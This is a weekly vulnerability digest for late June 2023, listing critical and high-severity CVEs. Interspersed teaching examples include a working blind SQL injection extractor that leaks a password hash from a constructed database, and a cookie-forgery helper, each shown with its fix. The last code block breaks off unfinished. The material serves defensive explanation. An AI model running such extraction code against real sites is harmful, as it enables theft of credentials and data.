Weekly Vulnerabilities Reports > June 19 to 25, 2023

Overview

526 new vulnerabilities were reported during this period, including 70 critical vulnerabilities and 191 high severity vulnerabilities. This weekly summary reports vulnerabilities in 1073 products from 257 vendors including Apple, Dell, Huawei, Mozilla, and Xwiki. Vulnerabilities are notably categorized as "Cross-site Scripting", "Improper Input Validation", "Out-of-bounds Write", "SQL Injection", and "Out-of-bounds Read".

  • 390 reported vulnerabilities are remotely exploitable.
  • 1 reported vulnerability has a public exploit available.
  • 164 reported vulnerabilities are related to weaknesses in OWASP Top Ten.
  • 332 reported vulnerabilities are exploitable by an anonymous user.
  • Apple has the most reported vulnerabilities, with 71 reported vulnerabilities.
  • Mozilla has the most reported critical vulnerabilities, with 8 reported vulnerabilities.

Summary counters (values not captured in this copy): total vulnerabilities, critical risk, high risk, medium risk, low risk, remotely exploitable, locally exploitable, exploit available, exploitable anonymously, affecting web application.

Vulnerability Details

The following table lists reported vulnerabilities for the period covered by this report:


70 Critical Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-06-19 CVE-2019-25136 Mozilla Unspecified vulnerability in Mozilla Firefox

A compromised child process could have injected XBL Bindings into privileged CSS rules, resulting in arbitrary code execution and a sandbox escape.

10.0
2023-06-22 CVE-2023-36355 TP Link Classic Buffer Overflow vulnerability in Tp-Link Tl-Wr940N Firmware

TP-Link TL-WR940N V4 was discovered to contain a buffer overflow via the ipStart parameter at /userRpm/WanDynamicIpV6CfgRpm.

9.9
2023-06-22 CVE-2023-35926 Linuxfoundation Code Injection vulnerability in Linuxfoundation Backstage

Backstage is an open platform for building developer portals.

9.9
2023-06-25 CVE-2023-36660 Nettle Project Out-of-bounds Write vulnerability in Nettle Project Nettle 3.9

The OCB feature in libnettle in Nettle 3.9 before 3.9.1 allows memory corruption.

9.8
2023-06-24 CVE-2023-3197 Inspireui Unspecified vulnerability in Inspireui Mstore API

The MStore API plugin for WordPress is vulnerable to Unauthenticated Blind SQL Injection via the 'id' parameter in versions up to, and including, 4.0.1 due to insufficient escaping on the user supplied parameters and lack of sufficient preparation on the existing SQL query.

9.8
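The MStore API entry above attributes the bug to interpolating the 'id' parameter into an existing query without escaping or preparation. The following is an added example and not the plugin's code: a hypothetical WordPress-style lookup with that defect, the parameterised fix, and a boolean-based blind extraction that recovers a secret through nothing more than the "found / not found" signal. The in-memory database and its rows are constructed for the demo.

```python
# Added example (not the MStore API plugin's code): a hypothetical
# WordPress-style lookup that interpolates the 'id' parameter, the
# parameterised fix, and a boolean-based blind extraction that works
# against the vulnerable version. Database contents are constructed.
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pass_hash TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?)", [(1, "Hello"), (2, "Sale")])
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'secret-hash')")
    conn.commit()
    return conn


def post_exists_vulnerable(conn, user_id):
    # The raw request parameter is spliced into the statement, the
    # equivalent of skipping $wpdb->prepare() and escaping nothing.
    sql = f"SELECT id FROM posts WHERE id = {user_id}"
    return conn.execute(sql).fetchone() is not None


def post_exists_fixed(conn, user_id):
    # Reject anything that is not an integer, then bind the value so
    # the database never parses it as SQL.
    try:
        id_int = int(user_id)
    except (TypeError, ValueError):
        return False
    row = conn.execute("SELECT id FROM posts WHERE id = ?", (id_int,)).fetchone()
    return row is not None


def blind_extract(oracle, column_expr, max_len=32):
    """Boolean-based blind SQLi: oracle(payload) only reports whether the
    injected query still returned a row. Each character is recovered by
    binary search over printable ASCII (32..126)."""
    out = ""
    for pos in range(1, max_len + 1):
        # stop once the secret is shorter than the position being probed
        if not oracle(f"1 AND length(({column_expr})) >= {pos}"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"1 AND unicode(substr(({column_expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def demo():
    """Leak the admin password hash through the vulnerable endpoint."""
    conn = make_db()
    oracle = lambda payload: post_exists_vulnerable(conn, payload)
    return blind_extract(oracle, "SELECT pass_hash FROM users WHERE id = 1")


if __name__ == "__main__":
    print(demo())  # prints secret-hash
```

The point of `blind_extract` is that an endpoint which only answers "exists" or "does not exist" still leaks whole columns at roughly seven requests per character; the fix is not better escaping but never letting the parameter reach the SQL parser.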
2023-06-23 CVE-2023-35169 Webklex Path Traversal vulnerability in Webklex PHP-Imap

PHP-IMAP is a wrapper for common IMAP communication without the need to have the php-imap module installed / enabled.

9.8
2023-06-23 CVE-2023-34460 Tauri Improper Authorization vulnerability in Tauri 1.4.0

Tauri is a framework for building binaries for all major desktop platforms.

9.8
2023-06-23 CVE-2022-22630 Apple Use After Free vulnerability in Apple mac OS X and Macos

A use after free issue was addressed with improved memory management.

9.8
2023-06-23 CVE-2023-32387 Apple Use After Free vulnerability in Apple Macos

A use-after-free issue was addressed with improved memory management.

9.8
2023-06-23 CVE-2023-32412 Apple Use After Free vulnerability in Apple products

A use-after-free issue was addressed with improved memory management.

9.8
2023-06-23 CVE-2023-32419 Apple Unspecified vulnerability in Apple Iphone OS

The issue was addressed with improved bounds checks.

9.8
2023-06-23 CVE-2023-3391 Oretnom23 SQL Injection vulnerability in Oretnom23 Human Resource Management System 1.0

A vulnerability was found in SourceCodester Human Resource Management System 1.0.

9.8
2023-06-23 CVE-2023-30258 Magnussolution OS Command Injection vulnerability in Magnussolution Magnusbilling

Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.

9.8
2023-06-23 CVE-2023-3383 Game Result Matrix System Project SQL Injection vulnerability in Game Result Matrix System Project Game Result Matrix System 1.0

A vulnerability, which was classified as critical, was found in SourceCodester Game Result Matrix System 1.0.

9.8
2023-06-23 CVE-2023-3380 Wavlink Injection vulnerability in Wavlink Wn579X3 Firmware 20200515

A vulnerability classified as critical has been found in Wavlink WN579X3 up to 20230615.

9.8
2023-06-23 CVE-2023-33299 Fortinet Deserialization of Untrusted Data vulnerability in Fortinet Fortinac

A deserialization of untrusted data in Fortinet FortiNAC below 7.2.1, below 9.4.3, below 9.2.8 and all earlier versions of 8.x allows an attacker to execute unauthorized code or commands via a specifically crafted request on the inter-server communication port.

9.8
2023-06-22 CVE-2023-28094 Pega Unspecified vulnerability in Pega Platform

Pega platform clients who are using versions 7.4 through 8.8.x and have upgraded from a version prior to 8.x may be utilizing default credentials.

9.8
2023-06-22 CVE-2023-3128 Grafana Authentication Bypass by Spoofing vulnerability in Grafana

Grafana is validating Azure AD accounts based on the email claim.

9.8
2023-06-22 CVE-2023-32571 Dynamic Linq Incorrect Comparison vulnerability in Dynamic-Linq Linq

Dynamic Linq 1.0.7.10 through 1.2.25 before 1.3.0 allows attackers to execute arbitrary code and commands when untrusted input to methods including Where, Select, OrderBy is parsed.

9.8
2023-06-22 CVE-2023-2611 Advantech Use of Hard-coded Credentials vulnerability in Advantech R-Seenet

Advantech R-SeeNet version 2.4.22 is installed with a hidden root-level user that is not available in the users list.

9.8
2023-06-22 CVE-2023-3326 Freebsd Improper Authentication vulnerability in Freebsd

pam_krb5 authenticates a user by essentially running kinit with the password, getting a ticket-granting ticket (tgt) from the Kerberos KDC (Key Distribution Center) over the network, as a way to verify the password.

9.8
2023-06-22 CVE-2023-36097 Funadmin Unrestricted Upload of File with Dangerous Type vulnerability in Funadmin 3.3.2/3.3.3

funadmin v3.3.2 and v3.3.3 are vulnerable to Insecure file upload via the plugins install.

9.8
2023-06-22 CVE-2023-35174 Livebook OS Command Injection vulnerability in Livebook

Livebook is a web application for writing interactive and collaborative code notebooks.

9.8
2023-06-22 CVE-2023-20892 Vmware Out-of-bounds Write vulnerability in VMWare Vcenter Server

The vCenter Server contains a heap overflow vulnerability due to the usage of uninitialized memory in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may exploit heap-overflow vulnerability to execute arbitrary code on the underlying operating system that hosts vCenter Server.

9.8
2023-06-22 CVE-2023-20893 Vmware Use After Free vulnerability in VMWare Vcenter Server

The VMware vCenter Server contains a use-after-free vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may exploit this issue to execute arbitrary code on the underlying operating system that hosts vCenter Server.

9.8
2023-06-22 CVE-2023-20894 Vmware Out-of-bounds Write vulnerability in VMWare Vcenter Server

The VMware vCenter Server contains an out-of-bounds write vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger an out-of-bound write by sending a specially crafted packet leading to memory corruption.

9.8
2023-06-22 CVE-2023-20895 Vmware Out-of-bounds Write vulnerability in VMWare Vcenter Server

The VMware vCenter Server contains a memory corruption vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger a memory corruption vulnerability which may bypass authentication.

9.8
2023-06-22 CVE-2023-29711 Interlink Unspecified vulnerability in Interlink Psg-5124 Firmware 1.0.4

An incorrect access control issue was discovered in Interlink PSG-5124 version 1.0.4, allows attackers to execute arbitrary code via crafted GET request.

9.8
2023-06-22 CVE-2023-34939 Onlyoffice Path Traversal vulnerability in Onlyoffice

Onlyoffice Community Server before v12.5.2 was discovered to contain a remote code execution (RCE) vulnerability via the component UploadProgress.ashx.

9.8
2023-06-22 CVE-2023-29931 Laravels Project Unspecified vulnerability in Laravels Project Laravels 3.7.35

laravel-s 3.7.35 is vulnerable to Local File Inclusion via /src/Illuminate/Laravel.php.

9.8
2023-06-22 CVE-2023-34601 Jeesite SQL Injection vulnerability in Jeesite

Jeesite before commit 10742d3 was discovered to contain a SQL injection vulnerability via the component ${businessTable} at /act/ActDao.xml.

9.8
2023-06-21 CVE-2023-33584 Enrollment System Project SQL Injection vulnerability in Enrollment System Project Enrollment System 1.0

Sourcecodester Enrollment System Project V1.0 is vulnerable to SQL Injection (SQLI) attacks, which allow an attacker to manipulate the SQL queries executed by the application.

9.8
2023-06-21 CVE-2023-34340 Apache Improper Authentication vulnerability in Apache Accumulo 2.1.0

Improper Authentication vulnerability in Apache Software Foundation Apache Accumulo. This issue affects Apache Accumulo: 2.1.0. Accumulo 2.1.0 contains a defect in the user authentication process that may succeed when invalid credentials are provided.

9.8
2023-06-20 CVE-2023-34563 Netgear Classic Buffer Overflow vulnerability in Netgear R6250 Firmware 1.0.4.48

Netgear R6250 firmware version 1.0.4.48 is vulnerable to a buffer overflow after authentication.

9.8
2023-06-20 CVE-2023-33869 Enphase OS Command Injection vulnerability in Enphase Envoy Firmware D7.0.88

Enphase Envoy version D7.0.88 is vulnerable to a command injection exploit that may allow an attacker to execute root commands.

9.8
2023-06-20 CVE-2023-35885 MGT Commerce Reliance on Cookies without Validation and Integrity Checking vulnerability in Mgt-Commerce Cloudpanel

CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication.

9.8
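The CloudPanel entry above is classified as reliance on cookies without validation and integrity checking. As an added example, and not CloudPanel's code, the block below shows the pattern beside an HMAC-signed cookie the server can actually verify; the secret, the cookie layout and the user names are hypothetical.

```python
# Added example (not CloudPanel's code): a file-manager style session
# cookie that is trusted as sent, beside an HMAC-signed cookie the
# server can verify. The secret, cookie layout and user names are
# hypothetical.
import base64
import hashlib
import hmac
from typing import Optional

SECRET = b"hypothetical-server-secret-keep-out-of-git"


def weak_user_from_cookie(cookie: str) -> Optional[str]:
    """CWE-565 pattern: whatever name the client puts after 'user=' wins."""
    if not cookie.startswith("user="):
        return None
    return cookie[len("user="):]


def sign_cookie(user: str, key: bytes = SECRET) -> str:
    payload = base64.urlsafe_b64encode(user.encode()).decode()
    mac = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"user={payload}.{mac}"


def user_from_signed_cookie(cookie: str, key: bytes = SECRET) -> Optional[str]:
    """Return the user only if the MAC over the payload verifies."""
    if not cookie.startswith("user="):
        return None
    payload, sep, mac = cookie[len("user="):].rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    # constant-time compare: a plain == would leak how many MAC bytes matched
    if not hmac.compare_digest(expected, mac):
        return None
    try:
        return base64.urlsafe_b64decode(payload.encode()).decode()
    except (ValueError, UnicodeDecodeError):
        return None


def forge_as_admin(genuine_cookie: str) -> str:
    """Keep a legitimate user's MAC but swap in the admin payload."""
    _, mac = genuine_cookie[len("user="):].rpartition(".")[::2]
    admin_payload = base64.urlsafe_b64encode(b"admin").decode()
    return f"user={admin_payload}.{mac}"
```

Signing gives integrity only: the cookie is still replayable until the server also binds an expiry and a session identifier into the signed payload and can revoke it.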
2023-06-20 CVE-2023-3340 Online School Fees System Project SQL Injection vulnerability in Online School Fees System Project Online School Fees System 1.0

A vulnerability was found in SourceCodester Online School Fees System 1.0 and classified as critical.

9.8
2023-06-20 CVE-2020-20413 Wuzhicms SQL Injection vulnerability in Wuzhicms 4.1.0

SQL injection vulnerability found in WUZHICMS v.4.1.0 allows a remote attacker to execute arbitrary code via the checktitle() function in admin/content.php.

9.8
2023-06-20 CVE-2020-20703 VIM Classic Buffer Overflow vulnerability in VIM 8.1.2135

Buffer Overflow vulnerability in VIM v.8.1.2135 allows a remote attacker to execute arbitrary code via the operand parameter.

9.8
2023-06-20 CVE-2020-20718 Pluck CMS Unrestricted Upload of File with Dangerous Type vulnerability in Pluck-Cms Pluckcms 4.7.10

File Upload vulnerability in PluckCMS v.4.7.10 dev versions allows a remote attacker to execute arbitrary code via a crafted image file to the save_file() parameter.

9.8
2023-06-20 CVE-2020-20735 8Cms Unrestricted Upload of File with Dangerous Type vulnerability in 8Cms Ljcms 4.3.R60321

File Upload vulnerability in LJCMS v.4.3.R60321 allows a remote attacker to execute arbitrary code via the ljcms/index.php parameter.

9.8
2023-06-20 CVE-2020-21174 Feehi Unrestricted Upload of File with Dangerous Type vulnerability in Feehi Feehicms 2.0.7.1

File Upload vulnerability in liufee CMS v.2.0.7.1 allows a remote attacker to execute arbitrary code via the image suffix function.

9.8
2023-06-20 CVE-2020-21474 Nucleuscms Unrestricted Upload of File with Dangerous Type vulnerability in Nucleuscms 3.71

File Upload vulnerability in NucleusCMS v.3.71 allows a remote attacker to execute arbitrary code via the /nucleus/plugins/skinfiles/?dir=rsd parameter.

9.8
2023-06-20 CVE-2020-21489 Feehi Unrestricted Upload of File with Dangerous Type vulnerability in Feehi Feehicms 2.0.8

File Upload vulnerability in Feehicms v.2.0.8 allows a remote attacker to execute arbitrary code via the /admin/index.php?r=admin-user%2Fupdate-self component.

9.8
2023-06-20 CVE-2023-34541 Langchain Unspecified vulnerability in Langchain 0.0.171

Langchain 0.0.171 is vulnerable to Arbitrary code execution in load_prompt.

9.8
2023-06-20 CVE-2023-34600 Adiscon SQL Injection vulnerability in Adiscon Loganalyzer

Adiscon LogAnalyzer v4.1.13 and before is vulnerable to SQL Injection.

9.8
2023-06-20 CVE-2023-35854 Zohocorp Missing Authentication for Critical Function vulnerability in Zohocorp Manageengine Adselfservice Plus

Zoho ManageEngine ADSelfService Plus through 6113 has an authentication bypass that can be exploited to steal the domain controller session token for identity spoofing, thereby achieving the privileges of the domain controller administrator.

9.8
2023-06-20 CVE-2023-3337 Online Shopping System Advanced Project Improper Authentication vulnerability in Online Shopping System Advanced Project Online Shopping System Advanced 1.0

A vulnerability was found in PuneethReddyHC Online Shopping System Advanced 1.0.

9.8
2023-06-20 CVE-2023-3325 Cmscommander Insufficient Entropy vulnerability in Cmscommander CMS Commander

The CMS Commander plugin for WordPress is vulnerable to authorization bypass due to the use of an insufficiently unique cryptographic signature on the 'cmsc_add_site' function in versions up to, and including, 2.287.

9.8
2023-06-19 CVE-2023-34159 Huawei Unspecified vulnerability in Huawei Emui 13.0.0

Improper permission control vulnerability in the Notepad app. Successful exploitation of the vulnerability may lead to privilege escalation, which affects availability and confidentiality.

9.8
2023-06-19 CVE-2023-31411 Sick Missing Authentication for Critical Function vulnerability in Sick Eventcam APP

A remote unprivileged attacker can modify and access configuration settings on the EventCam App due to the absence of API authentication.

9.8
2023-06-19 CVE-2023-2907 Marksoft SQL Injection vulnerability in Marksoft

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Marksoft allows SQL Injection. This issue affects Marksoft: through Mobile:v.7.1.7 ; Login:1.4 ; API:20230605.

9.8
2023-06-19 CVE-2022-47586 Themefic SQL Injection vulnerability in Themefic Ultimate Addons for Contact Form 7

Unauth.

9.8
2023-06-19 CVE-2023-27992 Zyxel OS Command Injection vulnerability in Zyxel Nas326 Firmware, Nas540 Firmware and Nas542 Firmware

The pre-authentication command injection vulnerability in the Zyxel NAS326 firmware versions prior to V5.21(AAZF.14)C0, NAS540 firmware versions prior to V5.21(AATB.11)C0, and NAS542 firmware versions prior to V5.21(ABAG.11)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands remotely by sending a crafted HTTP request.

9.8
2023-06-19 CVE-2023-25736 Mozilla Unspecified vulnerability in Mozilla Firefox

An invalid downcast from `nsHTMLDocument` to `nsIContent` could have led to undefined behavior.

9.8
2023-06-19 CVE-2023-29542 Mozilla Unspecified vulnerability in Mozilla Firefox

A newline in a filename could have been used to bypass the file extension security mechanisms that replace malicious file extensions such as .lnk with .download.

9.8
2023-06-19 CVE-2023-34416 Mozilla Out-of-bounds Write vulnerability in Mozilla Firefox

Memory safety bugs present in Firefox 113, Firefox ESR 102.11, and Thunderbird 102.12.

9.8
2023-06-19 CVE-2023-34417 Mozilla Out-of-bounds Write vulnerability in Mozilla Firefox

Memory safety bugs present in Firefox 113.

9.8
2023-06-19 CVE-2023-29531 Mozilla Out-of-bounds Write vulnerability in Mozilla Firefox

An attacker could have caused an out of bounds memory access using WebGL APIs, leading to memory corruption and a potentially exploitable crash. *This bug only affects Firefox and Thunderbird for macOS.

9.8
2023-06-19 CVE-2023-32216 Mozilla Out-of-bounds Write vulnerability in Mozilla Firefox

Memory safety bugs present in Firefox 112.

9.8
2023-06-19 CVE-2023-27396 Omron Missing Authentication for Critical Function vulnerability in Omron products

FINS (Factory Interface Network Service) is a message communication protocol, which is designed to be used in closed FA (Factory Automation) networks, and is used in FA networks composed of OMRON products.

9.8
2023-06-19 CVE-2023-35853 Oisf Unspecified vulnerability in Oisf Suricata

In Suricata before 6.0.13, an adversary who controls an external source of Lua rules may be able to execute Lua code.

9.8
2023-06-19 CVE-2023-35855 Valvesoftware Classic Buffer Overflow vulnerability in Valvesoftware Counter-Strike

A buffer overflow in Counter-Strike through 8684 allows a game server to execute arbitrary code on a remote client's machine by modifying the lservercfgfile console variable.

9.8
2023-06-19 CVE-2023-35856 Nintendo Classic Buffer Overflow vulnerability in Nintendo Mario Kart WII

A buffer overflow in Nintendo Mario Kart Wii RMCP01, RMCE01, RMCJ01, and RMCK01 can be exploited by a game client to execute arbitrary code on a client's machine via a crafted packet.

9.8
2023-06-19 CVE-2023-35857 Siren Insufficient Session Expiration vulnerability in Siren Investigate 12.1.7/13.2.0/13.2.1

In Siren Investigate before 13.2.2, session keys remain active even after logging out.

9.8
2023-06-19 CVE-2023-35839 Solon Deserialization of Untrusted Data vulnerability in Solon

A bypass in the component sofa-hessian of Solon before v2.3.3 allows attackers to execute arbitrary code via providing crafted payload.

9.8
2023-06-23 CVE-2023-35172 Nextcloud Improper Restriction of Excessive Authentication Attempts vulnerability in Nextcloud Server

NextCloud Server and NextCloud Enterprise Server provide file storage for Nextcloud, a self-hosted productivity platform.

9.1
2023-06-22 CVE-2023-2989 Globalscape Out-of-bounds Read vulnerability in Globalscape EFT Server 6.2.31.2

Fortra Globalscape EFT versions before 8.1.0.16 suffer from an out of bounds memory read in their administration server, which can allow an attacker to crash the service or bypass authentication if successfully exploited.

9.1
2023-06-19 CVE-2023-29158 Subnet Authentication Bypass by Capture-replay vulnerability in Subnet Powersystem Center 2020

SUBNET PowerSYSTEM Center versions 2020 U10 and prior are vulnerable to replay attacks which may result in a denial-of-service condition or a loss of data integrity.

9.1
2023-06-19 CVE-2023-29534 Mozilla Unspecified vulnerability in Mozilla Firefox and Firefox Focus

Different techniques existed to obscure the fullscreen notification in Firefox and Focus for Android.

9.1

191 High Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-06-25 CVE-2023-36663 IT Novum SQL Injection vulnerability in It-Novum Openitcockpit 4.6.4

it-novum openITCOCKPIT (aka open IT COCKPIT) 4.6.4 before 4.6.5 allows SQL Injection (by authenticated users) via the sort parameter of the API interface.

8.8
2023-06-25 CVE-2023-36630 MGT Commerce Unrestricted Upload of File with Dangerous Type vulnerability in Mgt-Commerce Cloudpanel

In CloudPanel before 2.3.1, insecure file upload leads to privilege escalation and authentication bypass.

8.8
2023-06-24 CVE-2023-1722 Yoga Class Registration System Project Cross-Site Request Forgery (CSRF) vulnerability in Yoga Class Registration System Project Yoga Class Registration System 1.0

Yoga Class Registration System version 1.0 allows an administrator to execute commands on the server.

8.8
2023-06-23 CVE-2023-35932 Jcvi Project Improper Validation of Specified Quantity in Input vulnerability in Jcvi Project Jcvi

jcvi is a Python library to facilitate genome assembly, annotation, and comparative genomics.

8.8
2023-06-23 CVE-2023-35165 Amazon Incorrect Authorization vulnerability in Amazon AWS Cloud Development KIT

AWS Cloud Development Kit (AWS CDK) is an open-source software development framework to define cloud infrastructure in code and provision it through AWS CloudFormation.

8.8
2023-06-23 CVE-2023-35928 Nextcloud Unspecified vulnerability in Nextcloud Server

Nextcloud Server is a space for data storage on Nextcloud, a self-hosted productivity platform.

8.8
2023-06-23 CVE-2023-34203 Progress Injection vulnerability in Progress Openedge, Openedge Explorer and Openedge Management

In Progress OpenEdge OEM (OpenEdge Management) and OEE (OpenEdge Explorer) before 12.7, a remote user (who has any OEM or OEE role) could perform a URL injection attack to change identity or role membership, e.g., escalate to admin.

8.8
2023-06-23 CVE-2023-36345 Codekop Cross-site Scripting vulnerability in Codekop 2.0

A Cross-Site Request Forgery (CSRF) in POS Codekop v2.0 allows attackers to escalate privileges.

8.8
2023-06-23 CVE-2023-36348 Codekop Missing Authorization vulnerability in Codekop 2.0

POS Codekop v2.0 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the filename parameter.

8.8
2023-06-23 CVE-2023-34672 Elenos Unspecified vulnerability in Elenos Etg150 Firmware 3.12

Improper access control allows adding a high-privilege user on the Elenos ETG150 FM transmitter running version 3.12 by exploiting the user's role within the admin profile.

8.8
2023-06-23 CVE-2023-32373 Apple, Redhat Use After Free vulnerability in multiple products

A use-after-free issue was addressed with improved memory management.

8.8
2023-06-23 CVE-2023-32435 Apple Out-of-bounds Write vulnerability in Apple products

A memory corruption issue was addressed with improved state management.

8.8
2023-06-23 CVE-2023-32439 Apple Type Confusion vulnerability in Apple products

A type confusion issue was addressed with improved checks.

8.8
2023-06-23 CVE-2023-34671 Elenos Unspecified vulnerability in Elenos Etg150 FM Firmware 3.12

Improper access control leads to privilege escalation on the Elenos ETG150 FM transmitter running version 3.12 by exploiting the user's role in the user profile.

8.8
2023-06-23 CVE-2023-35152 Xwiki Code Injection vulnerability in Xwiki

XWiki Platform is a generic wiki platform.

8.8
2023-06-23 CVE-2023-23679 Jshelpdesk Authorization Bypass Through User-Controlled Key vulnerability in Jshelpdesk

Authorization Bypass Through User-Controlled Key vulnerability in JS Help Desk js-support-ticket allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects JS Help Desk: from n/a through 2.7.7.

8.8
2023-06-23 CVE-2023-36271 GNU Out-of-bounds Write vulnerability in GNU Libredwg 0.12.5

LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_wcs2nlen at bits.c.

8.8
2023-06-23 CVE-2023-36272 GNU Out-of-bounds Write vulnerability in GNU Libredwg 0.12.5

LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_utf8_to_TU at bits.c.

8.8
2023-06-23 CVE-2023-36273 GNU Out-of-bounds Write vulnerability in GNU Libredwg 0.12.5

LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_calc_CRC at bits.c.

8.8
2023-06-23 CVE-2023-36274 GNU Out-of-bounds Write vulnerability in GNU Libredwg 0.12.5

LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_write_TF at bits.c.

8.8
2023-06-23 CVE-2023-30260 Raspap Command Injection vulnerability in Raspap

Command injection vulnerability in RaspAP raspap-webgui 2.8.8 and earlier allows remote attackers to run arbitrary commands via crafted POST request to hostapd settings form.

8.8
2023-06-23 CVE-2023-31469 Apache Improper Privilege Management vulnerability in Apache Streampipes

A REST interface in Apache StreamPipes (versions 0.69.0 to 0.91.0) was not properly restricted to admin-only access.

8.8
2023-06-22 CVE-2023-36239 Libming Classic Buffer Overflow vulnerability in Libming 0.4.7

libming listswf 0.4.7 was discovered to contain a buffer overflow in the parseSWF_DEFINEFONTINFO() function at parser.c.

8.8
2023-06-22 CVE-2023-34028 Pluginus Cross-Site Request Forgery (CSRF) vulnerability in Pluginus Wolf - Wordpress Posts Bulk Editor and Manager Professional

Cross-Site Request Forgery (CSRF) vulnerability in realmag777 WOLF – WordPress Posts Bulk Editor and Manager Professional plugin versions <= 1.0.7.

8.8
2023-06-22 CVE-2023-23795 WEB Settler Cross-Site Request Forgery (CSRF) vulnerability in Web-Settler Form Builder

Cross-Site Request Forgery (CSRF) vulnerability in Muneeb Form Builder plugin versions <= 1.9.9.0.

8.8
2023-06-22 CVE-2023-35917 Woocommerce Cross-Site Request Forgery (CSRF) vulnerability in Woocommerce Paypal Payments

Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce PayPal Payments plugin versions <= 2.0.4.

8.8
2023-06-21 CVE-2023-0971 Silabs Incorrect Authorization vulnerability in Silabs Z/Ip Gateway SDK

A logic error in SiLabs Z/IP Gateway SDK 7.18.02 and earlier allows authentication to be bypassed, remote administration of Z-Wave controllers, and S0/S2 encryption keys to be recovered.

8.8
2023-06-21 CVE-2023-0972 Silabs Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Silabs Z/Ip Gateway SDK

A vulnerability in SiLabs Z/IP Gateway 7.18.01 and earlier allows an unauthenticated attacker within Z-Wave range to overflow a stack buffer, leading to arbitrary code execution.

8.8
2023-06-21 CVE-2023-3110 Silabs Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Silabs Unify Software Development KIT

A vulnerability in SiLabs Unify Gateway 1.3.1 and earlier allows an unauthenticated attacker within Z-Wave range to overflow a stack buffer, leading to arbitrary code execution.

8.8
2023-06-21 CVE-2022-3372 Riello UPS Cross-Site Request Forgery (CSRF) vulnerability in Riello-Ups Netman 204 Firmware 02.05

There is a CSRF vulnerability on Netman-204 version 02.05.

8.8
2023-06-21 CVE-2022-45287 Temenos Unspecified vulnerability in Temenos CWX 8.5.6

An access control issue in Registration.aspx of Temenos CWX 8.5.6 allows authenticated attackers to escalate privileges and perform arbitrary Administrative commands.

8.8
2023-06-20 CVE-2023-35166 Xwiki Unspecified vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

8.8
2023-06-20 CVE-2020-20067 Ebcms Unrestricted Upload of File with Dangerous Type vulnerability in Ebcms 1.1.0

File upload vulnerability in ebCMS v.1.1.0 allows a remote attacker to execute arbitrary code via the upload type parameter.

8.8
2023-06-20 CVE-2020-20726 Gilacms Cross-Site Request Forgery (CSRF) vulnerability in Gilacms Gila CMS 1.11.4

Cross Site Request Forgery vulnerability in Gila GilaCMS v.1.11.4 allows a remote attacker to execute arbitrary code via the cm/update_rows/user parameter.

8.8
2023-06-20 CVE-2020-21252 Hongcms Project Cross-Site Request Forgery (CSRF) vulnerability in Hongcms Project Hongcms 3.0.0

Cross Site Request Forgery vulnerability in Neeke HongCMS 3.0.0 allows a remote attacker to execute arbitrary code and escalate privileges via the updateusers parameter.

8.8
2023-06-20 CVE-2020-21325 Wuzhicms Unrestricted Upload of File with Dangerous Type vulnerability in Wuzhicms 4.1.0

An issue in WUZHI CMS v.4.1.0 allows a remote attacker to execute arbitrary code via the set_chache method of the function\common.func.php file.

8.8
2023-06-20 CVE-2023-2533 Papercut Cross-Site Request Forgery (CSRF) vulnerability in Papercut MF and Papercut NG

A Cross-Site Request Forgery (CSRF) vulnerability has been identified in PaperCut NG/MF, which, under specific conditions, could potentially enable an attacker to alter security settings or execute arbitrary code.

8.8
2023-06-20 CVE-2023-26436 Open Xchange Deserialization of Untrusted Data vulnerability in Open-Xchange Appsuite Backend

Attackers with access to the "documentconverterws" API were able to inject serialized Java objects that were not properly checked during deserialization.

8.8
2023-06-20 CVE-2023-3320 WP Sticky Social Project Unspecified vulnerability in WP Sticky Social Project WP Sticky Social 1.0.1

The WP Sticky Social plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.1.

8.8
2023-06-19 CVE-2023-34373 Zephyr Project Manager Project Cross-Site Request Forgery (CSRF) vulnerability in Zephyr Project Manager Project Zephyr Project Manager

Cross-Site Request Forgery (CSRF) vulnerability in Dylan James Zephyr Project Manager plugin versions <= 3.3.93.

8.8
2023-06-19 CVE-2023-2359 Themepunch Code Injection vulnerability in Themepunch Slider Revolution 3.0.95/4.1.4/4.2.2

The Slider Revolution WordPress plugin through 6.6.12 does not check for valid image files upon import, leading to an arbitrary file upload which may be escalated to Remote Code Execution in some server configurations.

8.8
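The Slider Revolution entry above, like the file-upload entries in the critical table (Funadmin, PluckCMS, LJCMS, Feehi, NucleusCMS, ebCMS), comes down to trusting a filename or extension instead of the bytes. As an added example, and not any of those projects' code, the validator below accepts an "image" only when its content, its extension and a server-chosen storage name all agree; the allow-list and the sample bytes are constructed for the demo.

```python
# Added example (not the Slider Revolution plugin's code): accept an
# uploaded "image" only when its bytes, its extension and the
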